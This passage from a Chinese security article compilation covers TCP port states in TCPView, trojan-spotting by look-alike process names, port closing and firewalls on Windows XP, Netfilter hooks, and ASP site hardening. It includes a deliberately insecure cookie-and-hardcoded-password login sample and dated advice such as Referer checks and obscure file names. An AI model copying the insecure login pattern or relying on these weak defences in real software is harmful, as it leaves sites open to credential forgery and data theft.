inetinfo.exe:1260 TCP 192.168.1.10:21 192.168.1.1:3009 ESTABLISHED

注意:处于ESTABLISHED状态的连接一定要格外注意，因为它也许不是个正常连接。后面要讲到这个问题。

3、 TIME_WAIT状态

现在从192.168.1.1这台计算机结束访问192.168.1.10的FTP服务。在本机的TCPView可以看出端口状态变为TIME_WAIT。

TIME_WAIT的意思是结束了这次连接。说明21端口曾经有过访问，但访问结束了。

[System Process]:0 TCP 192.168.1.10:21 192.168.1.1:3009 TIME_WAIT

4、小技巧

a、可以telnet一个开放的端口，来观察该端口的变化。比如看1025端口是开放的，在命令状态（如图1运行cmd）运行:

telnet 192.168.1.10 1025

b、从本机也可以测试，只不过显示的是本机连本机

c、在Tcpview中双击连接可看出程序的位置，右键点击该连接，选择End Process即可结束该连接

五）、客户端口的状态变化

客户端口实际上就是从本机访问其它计算机服务时打开的源端口，最多的应用是上网，下面就以访问baidu.com为例来看看端口开放以及状态的变化情况。

1、SYN_SENT状态

SYN_SENT状态表示请求连接，当你要访问其它的计算机的服务时首先要发个同步信号给该端口，此时状态为SYN_SENT，如果连接成功了就变为 ESTABLISHED，此时SYN_SENT状态非常短暂。但如果发现SYN_SENT非常多且在向不同的机器发出，那你的机器可能中了冲击波或震荡波 之类的病毒了。这类病毒为了感染别的计算机，它就要扫描别的计算机，在扫描的过程中对每个要扫描的计算机都要发出了同步请求，这也是出现许多 SYN_SENT的原因。

下面显示的是本机连接baidu.com网站时的开始状态，如果你的网络正常的，那很快就变为ESTABLISHED的连接状态。

IEXPLORE.EXE:2928 TCP 192.168.1.10:1035 202.108.250.249:80 SYN_SENT

2、ESTABLISHED状态

下面显示的是本机正在访问baidu.com网站。如果你访问的网站有许多内容比如访问www.ccidnet.com， 那会发现一个地址有许多ESTABLISHED，这是正常的，网站中的每个内容比如图片、flash等都要单独建立一个连接。看ESTABLISHED状 态时一定要注意是不是IEXPLORE.EXE程序（IE）发起的连接，如果是EXPLORE.EXE之类的程序发起的连接，那也许是你的计算机中了木马 了。

IEXPLORE.EXE:3120 TCP 192.168.1.10:1045 202.108.250.249:80 ESTABLISHED

3、TIME_WAIT状态

如果浏览网页完毕，那就变为TIME_WAIT状态。

[System Process]:0 TCP 192.168.1.10:4259 202.108.250.249:80 TIME_WAIT

六）、端口详细变迁图

以上是最主要的几个状态，实际还有一些，图4是TCP的状态详细变迁图（从TCP/IP详解中剪来），用粗的实线箭头表示正常的客户端状态变迁，用粗的虚线箭头表示正常的服务器状态变迁。这些不在本文的讨论范围。有兴趣的朋友可以好好研究一下。





图3 TCP的状态变迁图

七）、要点

一般用户一定要熟悉（再啰嗦几句）:

1、服务端口重点要看的是LISTENING状态和ESTABLISHED状态，LISTENING是本机开了哪些端口，ESTABLISHED是谁在访问你的机器，从哪个地址访问的。

2、客户端口的SYN_SENT状态和ESTABLISHED状态，SYN_SENT是本机向其它计算机发出的连接请求，一般这个状态存在的时间很 短，但如果本机发出了很多SYN_SENT，那可能就是中毒了。看ESTABLISHED状态是要发现本机正在和哪个机器传送数据，主要看是不是一个正常 程序发起的。

二、木马

什么是木马，简单的说就是在未经你许可偷偷在你的计算机中开个后门，木马开后门主要有两种方式。

1、有服务端口的木马

这类木马都要开个服务端口的后门，成功后该后门处于LISTENING状态，它的端口号可能固定一个数，也可能变化，还有的木马可以与正常的端口合 用，例如你开着正常的80端口（WEB服务），木马也用80端口。这种木马最大的特点就是有端口处于LISTENING状态，需要远程计算机连接它。这种 木马对一般用户比较好防范，将防火墙设为拒绝从外到内的连接即可。比较难防范的是反弹型木马。

2、反弹型木马

反弹型木马是从内向外的连接，它可以有效的穿透防火墙，而且即使你使用的是内网IP，他一样也能访问你的计算机。这种木马的原理是服务端主动连接客户 端（黑客）地址。木马的服务端软件就像你的Internet Explorer一样，使用动态分配端口去连接客户端的某一端口，通常是常用端口，像端口80。而且会使用隐避性较强的文件名，像 iexpiore.exe、explorer（IE的程序是IEXPLORE.EXE）。如果你不仔细看，你可能会以为是你的Internet Explorer。这样你的防火墙也会被骗过。如果你在TcpView中看到下面这样的连接一定要注意，很有可能是种木马了。 iexpiore.exe 192.168.1.10（本机IP）:1035（你的端口） Y.Y.Y.Y（远程IP）:80（远程端口）

或 Rundll32.exe 192.168.1.10（本机IP）:1035（你的端口） Y.Y.Y.Y（远程IP）:80（远程端口）

或 explorer.exe 192.168.1.10（本机IP）:1035（你的端口） Y.Y.Y.Y（远程IP）:80（远程端口）

　　三、安全

分析端口的目的就是要保证上网安全，根据以上的思路可以从以下几个方面来防范。

一）、关闭不需要的端口

对一般上网用户来说只要能访问Internet就行了，并不需要别人来访问你，也就是说没有必要开放服务端口，在WIN 98可以做到不开放任何服务端口上网，但在Win XP、Win 2000、Win 2003下不行，但可以关闭不必要的端口。图3是安装完WIN XP系统默认开的端口，以此为例关闭不必要的端口。

1、关闭137、138、139、445端口

这几个端口都是为共享而开的，是NetBios协议的应用，一般上网用户是不需要别人来共享你的内容的，而且也是漏洞最多的端口。关闭的方法很多，最近从网上学了一招非常好用，一次全部关闭上述端口。

开始-> 控制面板-> 系统-> 硬件-> 设备管理器-> 查看-> 显示隐藏的设备-> 非即插即用驱动程序-> Netbios over Tcpip。

找到图5界面后禁用该设备重新启动后即可。





图4 关闭137、138、139、445端口2、关闭123端口

有些蠕虫病毒可利用UDP 123端口，关闭的方法:如图6停止windows time服务。





图5 关闭123端口3、关闭1900端口

攻击者只要向某个拥有多台Win XP系统的网络发送一个虚假的UDP包，就可能会造成这些Win XP主机对指定的主机进行攻击（DDoS）。另外如果向该系统1900端口发送一个UDP包，令"Location"域的地址指向另一系统的 chargen端口，就有可能使系统陷入一个死循环，消耗掉系统的所有资源（需要安装硬件时需手动开启）。

关闭1900端口的方法如图7所示——停止SSDP Discovery Service 服务。





图6 关闭1900端口通过上面的办法关闭了一些有漏洞的或不用的端口后是不是就没问题了呢？不是。因为有些端口是不能关掉的。像135端口，它是RPC服务打开的端口如果把 这个服务停掉，那计算机就关机了，同样像Lsass打开的端口500和4500也不能关闭。冲击波病毒利用的就是135端口，对于不能关闭的端口最好的办 法一是常打补丁，端口都是相应的服务打开的，但是对于一般用户很难判断这些服务到底有什么用途，也很难找到停止哪些服务就能关闭相应的端口。最好的办法就 是下面要讲的安装防火墙。安装防火墙的作用通俗的说就像你不管住在一所结实的好房子里还是住在一所千疮百孔的破房子里，只要你在房子的四周建了一堵密不透 风的墙，那对于墙里的房子就是安全的。

二）、安装防火墙

对于一般用户来讲有下面三类防火墙

1、 自带的防火墙

关于Win XP 与Win 2003自带防火墙的设置请参阅天极网中拙作，不再赘述。

2、ADSL猫防火墙

通过ADSL上网的，如果有条件最好将ADSL猫设置为地址转换方式（NAT），也就是大家常说的路由模式，其实路由与NAT是不一样的，权且这么叫 吧。用NAT方式最大的好处是设置完毕后，ADSL猫就是一个放火墙，它一般只开放80、21、161等为了对ADSL猫进行设置开放的端口。如果不做端 口映射的话，一般从远程是攻击不到ADSL猫后面的计算机的。ADSL猫最大的安全隐患就是很多用户都不改变默认密码。这样黑客如果进到你的猫做个端口映 射就有可能进入到你的计算机，一定把默认密码改掉。

用自带的放火墙和ADSL猫的NAT方式基本可以抵御从外到内的攻击，也就是说即使服务端口开放（包括系统开放的端口和中了开个服务端口的木马），黑 客和类似震荡波一类的病毒也奈何不了你的计算机。上述防火墙只能防止从外到内的连接，不能防止从内到外的连接，当你打开网页和用QQ聊天时就是从内到外的 连接，反弹型木马就是利用放火墙的这一特性来盗取你机器的数据的。反弹型木马虽然十分隐蔽，但也不是没有马脚，防范这类木马最好的办法就是用第三方防火 墙。

3、第三方防火墙

前面说过，反弹型木马而且会使用隐避性较强的文件名，像iexpiore.exe、explorer等与IE的程序IEXPLORE.EXE很想的名 字或用一些rundll32之类的好像是系统文件的名字，但木马的本质就是要与远程的计算机通讯，只要通讯就会有连接。如下所示:正常连接是 IEXPLORE.EXE发起的，而非正常连接是木马程序explorer发起的。





图7 正常连接





图8 木马连接一般的防火墙都有应用程序访问网络的权限设置，如图8所示，在防火墙的这类选项中将不允许访问网络的应用程序选择X，即不允许访问网络。

在写这篇文章之前笔者中了一个反弹型木马，就是explorer程序向外连接，用了好几个查毒软件也没有杀掉，当时就先用天网放火墙阻止它访问网络，然后手工费了很大的劲才清除掉。可惜没有做截图。没有勇气为了写这篇文章再牺牲一把了。

4、用Tcpview结束一个连接

当你用Tcpview观察哪个连接有可能是不正常的连接，可在Tcpview中直接鼠标右键点击该连接，选择End Process即可结束该连接。

四、扫描

谈起扫描又是个大话题了，有端口扫描（Superscan）、漏洞扫描（X-scan）等，关于扫描的话题以后再论，本文只对一般用户简单说一下在线 安全检测。如果你按上面的说得作了相应的安全措施，就可以在网上找个在线测试安全的网站测试一下你目前系统的安全情况，如到下面网站:

1、千禧在线--在线检测

2、蓝盾在线检测

3、天网安全在线

4、诺顿在线安全检测

说明一点，测试机器时开了21、23、80端口，但这都是ADSL的服务端口，MODEM没有提供修改和关闭的地方，不过没关系，只要把密码设的复杂点就行了。

五、震荡波

如果你按上述关闭了445端口或者开启了放火墙那就不会受到震荡波及类似的病毒骚扰了，关于震荡波病毒的文章太多了，此处就不多谈。只要做好了安全防护，不管是震荡大波还是冲击小波只能在你的计算机门前掠过而奈何不了你。

六、后记

关于计算机的安全还有很多要设置，但对于一般用户来说，太多的安全设置就等于没有了安全，因为即使对于专业从事计算机安全的人员对于安全的设置也不是 件容易的事，何况对于对计算机的知识还不够的一般用户。如果要作很多设置才能保证安全，那肯定就有很多人不做了。对一般用户个人的建议是力所能及的事一定 要做，比如:

1、上网时一定要安装防病毒软件并及时升级。

2、至少安装一个防火墙，ADSL用户最好用路由方式上网，改掉默认密码。

3、经常打补丁，Windows用户最好将系统设为自动升级。

4、自己要做的就是用Tcpview 常常看看连接，防止反弹型木马。常常看看，时间长了也许就看成专家了。

5、Udp协议是不可靠传输，没有状态，从Tcpview中很难看出它是不是在传输数据，感兴趣的朋友可以用iris、sniffer这类的协议分析工具看看是不是有Udp的数据。关于这个话题以后再聊。

6、本文题目起的很大，但写起来又觉得很多问题都是别人说了再说的，也就没有深谈。

道高一尺，魔高一丈。网络安全将是一个永恒的话题，没有绝对的安全，但有了防范意识总比敞开了大门还不知道好吧。

知己知彼百战不殆　木马病毒的发展史

作者：hanbin　来源：赛迪网技术社区

计算机世界中的特洛伊木马病毒的名字由《荷马史诗》的特洛伊战记得来。故事说的是希腊人围攻特洛伊城十年后仍不能得手，于是阿迦门农受雅典娜的启发：把士兵藏匿于巨大无比的木马中，然后佯作退兵。当特洛伊人将木马作为战利品拖入城内时，高大的木马正好卡在城门间，进退两难。夜晚木马内的士兵爬出来，与城外的部队里应外合而攻下了特洛伊城。而计算机世界的特洛伊木马(Trojan)是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。

第一代木马：伪装型病毒

这种病毒通过伪装成一个合法性程序诱骗用户上当。世界上第一个计算机木马是出现在1986年的PC-Write木马。它伪装成共享软件PC-Write的2.72版本（事实上，编写PC-Write的Quicksoft公司从未发行过2.72版本），一旦用户信以为真运行该木马程序，那么他的下场就是硬盘被格式化。在我刚刚上大学的时候，曾听说我校一个前辈牛人在WAX机房上用BASIC作了一个登录界面木马程序，当你把你的用户ID，密码输入一个和正常的登录界面一模一样的伪登录界面后后，木马程序一面保存你的ID，和密码，一面提示你密码错误让你重新输入，当你第二次登录时，你已成了木马的牺牲品。此时的第一代木马还不具备传染特征。

第二代木马：AIDS型木马

继PC-Write之后，1989年出现了AIDS木马。由于当时很少有人使用电子邮件，所以AIDS的作者就利用现实生活中的邮件进行散播：给其他人寄去一封封含有木马程序软盘的邮件。之所以叫这个名称是因为软盘中包含有AIDS和HIV疾病的药品，价格，预防措施等相关信息。软盘中的木马程序在运行后，虽然不会破坏数据，但是他将硬盘加密锁死，然后提示受感染用户花钱消灾。可以说第二代木马已具备了传播特征（尽管通过传统的邮递方式）。

第三代木马：网络传播性木马

随着Internet的普及，这一代木马兼备伪装和传播两种特征并结合TCP/IP网络技术四处泛滥。同时他还有新的特征：

1.添加了“后门”功能。

所谓后门就是一种可以为计算机系统秘密开启访问入口的程序。一旦被安装，这些程序就能够使攻击者绕过安全程序进入系统。该功能的目的就是收集系统中的重要信息，例如，财务报告、口令及信用卡号。此外，攻击者还可以利用后门控制系统，使之成为攻击其它计算机的帮凶。由于后门是隐藏在系统背后运行的，因此很难被检测到。它们不像病毒和蠕虫那样通过消耗内存而引起注意。

2.添加了击键记录功能。

从名称上就可以知道，该功能主要是记录用户所有的击键内容然后形成击键记录的日志文件发送给恶意用户。恶意用户可以从中找到用户名、口令以及信用卡号等用户信息。这一代木马比较有名的有国外的BO2000（BackOrifice）和国内的冰河木马。它们有如下共同特点：基于网络的客户端/服务器应用程序。具有搜集信息、执行系统命令、重新设置机器、重新定向等功能。 当木马程序攻击得手后，计算机就完全在黑客控制的傀儡主机，黑客成了超级用户，用户的所有计算机操作不但没有任何秘密而言，而且黑客可以远程控制傀儡主机对别的主机发动攻击，这时候背俘获的傀儡主机成了黑客进行进一步攻击的挡箭牌和跳板。

虽然木马程序手段越来越隐蔽，但是苍蝇不叮无缝的蛋，只要加强个人安全防范意识，还是可以大大降低"中招"的几率。对此笔者有如下建议：安装个人防病毒软件、个人防火墙软件；及时安装系统补丁；对不明来历的电子邮件和插件不予理睬；经常去安全网站转一转，以便及时了解一些新木马的底细，做到知己知彼，百战不殆。

发展迅速的网络防火墙功夫深入到第七层

发展迅速的网络防火墙功夫深入到第七层

作者：hanbin　来源：华夏收集

编者按在短短的几年里，防火墙的功能重心从网络层发展到了应用层。本文阐述了这种变迁的技术背景，以及未来的防火墙技术走向。

应用层攻击挑战传统防火墙 　　

最近两年来，攻击者的兴趣明显从端口扫描和制造拒绝服务攻击（DoS Attack）转向了针对Web、E-mail甚至数据库等主流应用的攻击。传统的防火墙仅仅检查IP数据包的包头，而忽略了内容——如果用信件来做比喻，也就是只检查了信封而没有检查信纸。因此对这类应用层的攻击无能为力。可以说，仅仅靠第三层和第四层的IP地址和协议端口过滤的防火墙产品早已走到了尽头。 　　

战火烧向七层 　　

为了对抗应用层（OSI网络模型的第七层）的攻击，防火墙必须具备应用层的过滤能力，一些防火墙产品已经具备了这种能力。 　　

如果把计算机网络比做一座建筑，传统的包过滤防火墙就是在企业内部网络和Internet之间的一系列并列的门。每道门都有安检人员对到达的包裹（IP数据包）进行逐一检查，若没有发现数据包含有异常代码便开门放行。攻击者常用的伎俩就是通过端口扫描来检查哪些门是敞开不设防的，然后加以利用。晚些时候出现的具有状态检测功能的防火墙可以检查哪些数据包是来自Internet对内部网络访问请求的应答。也就是说，安检人员能够鉴别那些不请自来的包裹。 　　

但应用层攻击就要复杂得多，因为攻击数据包在绝大多数情况下是合法的数据包，不同的只是内容具有攻击性，而且因为IP数据包是分段传输的，其内容的判别需要将所有相关的包重组后才能准确进行。一旦这种攻击数据包通过了防火墙，它们通常会开始有条不紊地利用目标系统的漏洞制造缓冲区溢出，获得系统的控制权，然后以此为平台开始寻找周围其他系统的漏洞或者其他的蠕虫留下的后门，进而展开攻击。 　　

防火墙的对策 　　

对此，一些防火墙产品采取的应对措施是，针对每一类主流的应用， HTTP、SMTP、FTP和SQL Server数据库访问（基于RPC）都设置专门的过滤器，如果未来出现新的应用层威胁，还可以增加相应的过滤器。用户可以针对每一种过滤器进行应用相关的过滤设置，例如，可以通过限制任何HTTP访问请求的缓冲区不得超过3000个字节来防止一些蠕虫的攻击。在这种新的机制下，来自Internet的数据包被发送到各自的过滤器，过滤器会将数据包重组后进行内容扫描和判别。拿一封邮件来说，SMTP过滤器会等待相关的包到齐后，在转发之前重组邮件对其内容进行扫描，与已知类型的攻击进行比对，在确认这是正常流量后才允许通过。 　　

经过正确配置的现代防火墙可以阻挡绝大多数已知的病毒邮件和攻击代码。虽然阻挡未知的病毒和攻击要困难得多，但是经过合理的策略设置通常是有效的。正确设置策略的基础是企业用户对于自身业务需求的正确理解，例如，多数企业的用户通常是没有必要通过邮件来传递可执行文件和Visual Basic脚本代码的。用户可以通过阻断含有这类可执行附件的邮件来对付一些未知的病毒。一旦真的需要发送这类文件，也可以设置更有针对性的策略，比如只允许IT部门的用户发送含有可执行文件附件邮件，或者允许用户接收除含有名为“Kournikova.jpg.vbs”的脚本附件之外的所有邮件。 　　

安全与性能的矛盾 　

用户早已习惯于把安全性和性能看成是对立的，就像在机场的安检入口，检查的步骤越多，等待安检的队伍也就越长。对于防火墙来说，性能和安全的确是一对永远的矛盾，但是应用层过滤的功能对防火墙性能的影响并没有多数用户想象得那么大，一些防火墙标称每秒钟可处理超过1000个并发用户，同时保持每会话（Session）27Mbps的吞吐量。事实上，有些厂商通过硬件（ASIC）实现应用层的过滤引擎，能够达到更加接近线速(可理解为以太网交换机的处理极限)的处理能力。　　

新的挑战　

具有应用层过滤功能的防火墙可以更有效地阻挡当前多数病毒和攻击程序，但新的安全威胁的不断出现又对防火墙提出了新的挑战。攻击的来源正在变得更加复杂，而攻击的手段也愈加高明，最近垃圾邮件与攻击代码的结合就是一个典型的例证。这一方面需要防火墙设备对于应用层的内容有更好的认知和智能判别的能力，另一方面也需要防火墙更多地与其他的安全设备和应用有效配合，从而实现更加有力的防护。

Linux系统中防火墙的框架及简单分析

作者：hanbin　来源：华夏收集

Netfilter提供了一个抽象、通用化的框架，该框架定义的一个子功能的实现就是包过滤子系统框架包含以下五部分：

1. 为每种网络协议(IPv4、IPv6等)定义一套钩子函数（IPv4定义了5个钩子函数）, 这些钩子函数在数据报流过协议栈的几个关键点被调用。在这几个点中，协议栈将把数据报及钩子函数标号作为参数调用Netfilter框架。

2. 内核的任何模块可以对每种协议的一个或多个钩子进行注册，实现挂接，这样当某个数据包被传递给Netfilter框架时，内核能检测是否有任何模块对该协议和钩子函数进行了注册。若注册了，则调用该模块的注册时使用的回调函数，这样这些模块就有机会检查(可能还会修改)该数据包、丢弃该数据包及指示Netfilter将该数据包传入用户空间的队列。

3 .那些排队的数据包是被传递给用户空间的异步地进行处理。一个用户进程能检查数据包，修改数据包，甚至可以重新将该数据包通过离开内核的同一个钩子函数中注入到内核中。

4. 任何在IP层要被抛弃的IP数据包在真正抛弃之前都要进行检查。例如允许模块检查IP-Spoofed包（被路由抛弃）。

5.IP层的五个HOOK点的位置如下所示 :

(1)NF_IP_PRE_ROUTING：刚刚进入网络层的数据包通过此点（刚刚进行完版本号，校验 和等检测）， 源地址转换在此点进行；IP_Input.c中IP_Rcv调用。

(2)NF_IP_LOCAL_IN：经路由查找后，送往本机的通过此检查点,INPUT包过滤在此点进行；IP_local_deliver中调用

(3)NF_IP_FORWARD：要转发的包通过此检测点,FORWORD包过滤在此点进行；

(4)NF_IP_POST_ROUTING：所有马上便要通过网络设备出去的包通过此检测点，内置的目的地址转换功能（包括地址伪装）在此点进行；

(5)NF_IP_LOCAL_OUT：本机进程发出的包通过此检测点，OUTPUT包过滤在此点进行。

这些点是已经在内核中定义好的，内核模块能够注册在这些HOOK点进行的处理，可使用nf_register_hook函数指定。在数据报经过这些钩子函数时被调用，从而模块可以修改这些数据报，并向Netfilter返回如下值：

NF_ACCEPT 继续正常传输数据报

NF_DROP 丢弃该数据报，不再传输

NF_STOLEN 模块接管该数据报，不要继续传输该数据报

NF_QUEUE 对该数据报进行排队(通常用于将数据报给用户空间的进程进行处理)

NF_REPEAT 再次调用该钩子函数

一个基于Netfilter框架的、称为IPtables的数据报选择系统在Linux2.4内核中被应用，其实它就是IPchains的后继工具，但却有更强的可扩展性。内核模块可以注册一个新的规则表(table)，并要求数据报流经指定的规则表。这种数据报选择用于实现数据报过滤(filter表)，网络地址转换(Nat表)及数据报处理(Mangle表)。 Linux2.4内核提供的这三种数据报处理功能都基于Netfilter的钩子函数和IP表。它们是独立的模块，相互之间是独立的。它们都完美的集成到由Netfileter提供的框架中。

包过滤

Filter表格不会对数据报进行修改，而只对数据报进行过滤。IPtables优于IPchains的一个方面就是它更为小巧和快速。它是通过钩子函数NF_IP_LOCAL_IN, NF_IP_FORWARD及NF_IP_LOCAL_OUT接入Netfilter框架的。因此对于任何一个数 报只有一个地方对其进行过滤。这相对IPchains来说是一个巨大的改进，因为在IPchains中一个被转发的数据报会遍历三条链。

NAT

NAT表格监听三个Netfilter钩子函数：NF_IP_PRE_ROUTING、NF_IP_POST_ROUTING及NF_IP_LOCAL_OUT。 NF_IP_PRE_ROUTING实现对需要转发的数据报的源地址进行地址转换而NF_IP_POST_ROUTING则对需要转发的数据包的目的地址进行地址转换。对于本地数据报的目的地址的转换则由NF_IP_LOCAL_OUT来实现。NAT表格不同于filter表格，因为只有新连接的第一个数据报将遍历表格，而随后的数据报将根据第一个数据报的结果进行同样的转换处理。NAT表格被用在源NAT,目的NAT，伪装(其是源NAT的一个特例)及透明代理(其是目的NAT的一个特例)。

数据报处理(Packet Mangling)

Mangle表格在NF_IP_PRE_ROUTING和NF_IP_LOCAL_OUT钩子中进行注册。使用 mangle表，可以实现对数据报的修改或给数据报附上一些带外数据。当前mangle表支持修改TOS位及设置skb的nfmard字段。

源码分析

如果我们想加入自己的代码,便要用nf_register_hook函数，其函数原型为：

int nf_register_hook(struct nf_hook_ops *reg)

struct nf_hook_ops

{

struct list_head list;

/* User fills in from here down. */

nf_hookfn *hook;

int pf;

int hooknum;

/* Hooks are ordered in ascending priority. */

int priority;

};

我们的工作便是生成一个struct nf_hook_ops结构的实例，并用nf_register_hook将其HOOK上。其中list项我们总要初始化为{NULL,NULL}；由于一般在IP层工作，pf总是PF_INET；hooknum就是我们选择的HOOK点;一个HOOK点可能挂多个处理函数，谁先谁后，便要看优先级，即priority的指定了。Netfilter_IPv4.h中用一个枚举类型指定了内置的处理函数的优先级：

enum nf_IP_hook_priorities {

NF_IP_PRI_FIRST = INT_MIN,

NF_IP_PRI_CONNTRACK = -200,

NF_IP_PRI_MANGLE = -150,

NF_IP_PRI_NAT_DST = -100,

NF_IP_PRI_FILTER = 0,

NF_IP_PRI_NAT_SRC = 100,

NF_IP_PRI_LAST = INT_MAX,

};

Hook是提供的处理函数，也就是我们的主要工作，其原型为：

unsigned int nf_hookfn(unsigned int hooknum,

struct sk_buff **skb,

const struct net_device *in,

const struct net_device *out,

int (*okfn)(struct sk_buff *));

它的五个参数将由NFHOOK宏传进去。nf_register_hook根据reg中注册的协议簇类型和优先级在nf_hooks中找到相应的位置并插入到此表中。_hooks[NPROTO][NF_MAX_HOOKS]在Netfilter初始化时（Netfilter_init／Netfilter.c,而它在sock_init时调用）已经初始为一个空表。

例如IPtable在初始化时（init/IPtable_filter.c）调用nf_register_hook注册他的hook函数。

static struct nf_hook_ops IPt_ops[]

= { { { NULL, NULL }, IPt_hook, PF_INET, NF_IP_LOCAL_IN, NF_IP_PRI_FILTER },

{ { NULL, NULL }, IPt_hook, PF_INET, NF_IP_FORWARD, NF_IP_PRI_FILTER },

{ { NULL, NULL }, IPt_local_out_hook, PF_INET, NF_IP_LOCAL_OUT,

NF_IP_PRI_FILTER }

};

mangle在init/IPtable_mangle.c中注册它自己的hook函数。

static struct nf_hook_ops IPt_ops[]

= { { { NULL, NULL }, IPt_hook, PF_INET, NF_IP_PRE_ROUTING, NF_IP_PRI_MANGLE },

{ { NULL, NULL }, IPt_local_out_hook, PF_INET, NF_IP_LOCAL_OUT,

{NF_IP_PRI_MANGLE }

};

NAT在init/IP_nat_standalone.c中注册它自己的hook函数

/*包过滤前，更改目的地址*/

　static struct nf_hook_ops IP_nat_in_ops

杜绝入侵：八大法则防范ASP网站漏洞

杜绝入侵：八大法则防范ASP网站漏洞

作者：admin　来源：赛迪网技术社区

如何更好的达到防范黑客攻击，本人提一下个人意见！第一，免费程序不要真的就免费用，既然你可以共享原码，那么攻击者一样可以分析代码。如果在细节上注意防范，那样你站点的安全性就大大的提高了。即使出现了SQL Injection这样的漏洞，攻击者也不可能马上拿下你的站点。由于ASP的方便易用，越来越多的网站后台程序都使用ASP脚本语言。但是，由于ASP本身存在一些安全漏洞，稍不小心就会给黑客提供可乘之机。事实上，安全不仅是网管的事，编程人员也必须在某些安全细节上注意，养成良好的安全习惯，否则会给自己的网站带来巨大的安全隐患。目前，大多数网站上的ASP程序有这样那样的安全漏洞，但如果编写程序的时候注意一点的话，还是可以避免的。

1、用户名与口令被破解　　

攻击原理：用户名与口令，往往是黑客们最感兴趣的东西，如果被通过某种方式看到源代码，后果是严重的。防范技巧：涉及用户名与口令的程序最好封装在服务器端，尽量少在ASP文件里出现，涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接，在理想状态下只给它以执行存储过程的权限，千万不要直接给予该用户修改、插入、删除记录的权限。　　

2、验证被绕过

攻击原理：现在需要经过验证的ASP程序大多是在页面头部加一个判断语句，但这还不够，有可能被黑客绕过验证直接进入。

防范技巧：需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。

3、Inc文件泄露问题

攻击原理：当存在ASP的主页正在制作且没有进行最后调试完成以前，可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页进行查找，会得到有关文件的定位，并能在浏览器中查看到数据库地点和结构的细节，并以此揭示完整的源代码。　

防范技巧：程序员应该在网页发布前对它进行彻底的调试；安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密，其次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测到的名称，尽量使用无规则的英文字母。　　

4、自动备份被下载

攻击原理：在有些编辑ASP程序的工具中，当创建或者修改一个ASP文件时，编辑器自动创建一个备份文件，比如：UltraEdit就会备份一个.bak文件，如你创建或者修改了some.asp，编辑器会自动生成一个叫some.asp.bak文件，如果你没有删除这个bak文件，攻击者可以直接下载some.asp.bak文件，这样some.asp的源程序就会被下载。

防范技巧：上传程序之前要仔细检查，删除不必要的文档。对以BAK为后缀的文件要特别小心。

5、特殊字符

攻击原理：输入框是黑客利用的一个目标，他们可以通过输入脚本语言等对用户客户端造成损坏；如果该输入框涉及数据查询，他们会利用特殊查询语句，得到更多的数据库数据，甚至表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查，仍有可能被绕过。

防范技巧：在处理类似留言板、BBS等输入框的ASP程序中，最好屏蔽掉HTML、JavaScript、VBScript语句，如无特殊要求，可以限定只允许输入字母与数字，屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但要在客户端进行输入合法性检查，同时要在服务器端程序中进行类似检查。

6、数据库下载漏洞

攻击原理：在用Access做后台数据库时，如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称，那么他也能够下载这个Access数据库文件，这是非常危险的。

防范技巧：

(1)为你的数据库文件名称起个复杂的非常规的名字，并把它放在几层目录下。所谓 “非常规”， 打个比方说，比如有个数据库要保存的是有关书籍的信息， 可不要给它起个“book.mdb”的名字，而要起个怪怪的名称，比如d34ksfslf.mdb， 并把它放在如./kdslf/i44/studi/的几层目录下，这样黑客要想通过猜的方式得到你的Access数据库文件就难上加难了。

(2)不要把数据库名写在程序中。有些人喜欢把DSN写在程序中，比如：

　

DBPath = Server.MapPath（“cmddb.mdb”）

conn.Open “driver={Microsoft Access Driver （*.mdb）}；dbq=” & DBPath

假如万一给人拿到了源程序，你的Access数据库的名字就一览无余了。因此建议你在ODBC里设置数据源，再在程序中这样写：

conn.open“shujiyuan”

(3)使用Access来为数据库文件编码及加密。首先在“工具→安全→加密/解密数据库”中选取数据库（如：employer.mdb），然后按确定，接着会出现“数据库加密后另存为”的窗口，可存为：

“employer1.mdb”　　

要注意的是，以上的动作并不是对数据库设置密码，而只是对数据库文件加以编码，目的是为了防止他人使用别的工具来查看数据库文件的内容。接下来我们为数据库加密，首先打开经过编码了的 employer1.mdb，在打开时，选择“独占”方式。然后选取功能表的“工具→安全→设置数据库密码”，接着输入密码即可。这样即使他人得到了employer1.mdb文件，没有密码他也是无法看到 employer1.mdb中的内容。　　

7、防范远程注入攻击

这类攻击在以前应该是比较常见的攻击方式，比如POST攻击，攻击者可以随便的改变要提交的数据值已达到攻击目的。又如：COOKIES 的伪造，这一点更值得引起程序编写者或站长的注意，不要使用COOKIES来做为用户验证的方式，否则你和把钥匙留给贼是同一个道理。

比如:

If trim(Request. cookies ("uname"))="fqy" and Request.cookies("upwd")

=”fqy#e3i5.com” then

……..more………

End if

我想各位站长或者是喜好写程序的朋友千万别出这类错误，真的是不可饶恕。伪造COOKIES 都多少年了，你还用这样的就不能怪别人跑你的密码。涉及到用户密码或者是用户登陆时，你最好使用session 它才是最安全的。如果要使用COOKIES就在你的COOKIES上多加一个信息，SessionID，它的随机值是64位的，要猜解它，不可能。例：

if not (rs.BOF or rs.eof) then

login="true"

Session("username"&sessionID) = Username

Session("password"& sessionID) = Password

'Response.cookies(“username”)= Username

'Response.cookies(“Password”)= Password　　

下面我们来谈谈如何防范远程注入攻击,一般的攻击都是将单表提交文件拖到本地,将Form ACTION=”chk.asp” 指向你服务器中处理数据的文件即可.如果你全部的数据过滤都在单表页上，那么恭喜你，你将已经被脚本攻击了.怎么才能制止这样的远程攻击?好办,请看代码如下：程序体(9)

＜%

server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))

server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))

if mid(server_v1,8,len(server_v2))＜＞server_v2 then

response.write "＜br＞＜br＞＜center>"

response.write " "

response.write "你提交的路径有误，禁止从站点外部提交数据请不要乱改参数！"

response.write "

"

response.end

end if

%>

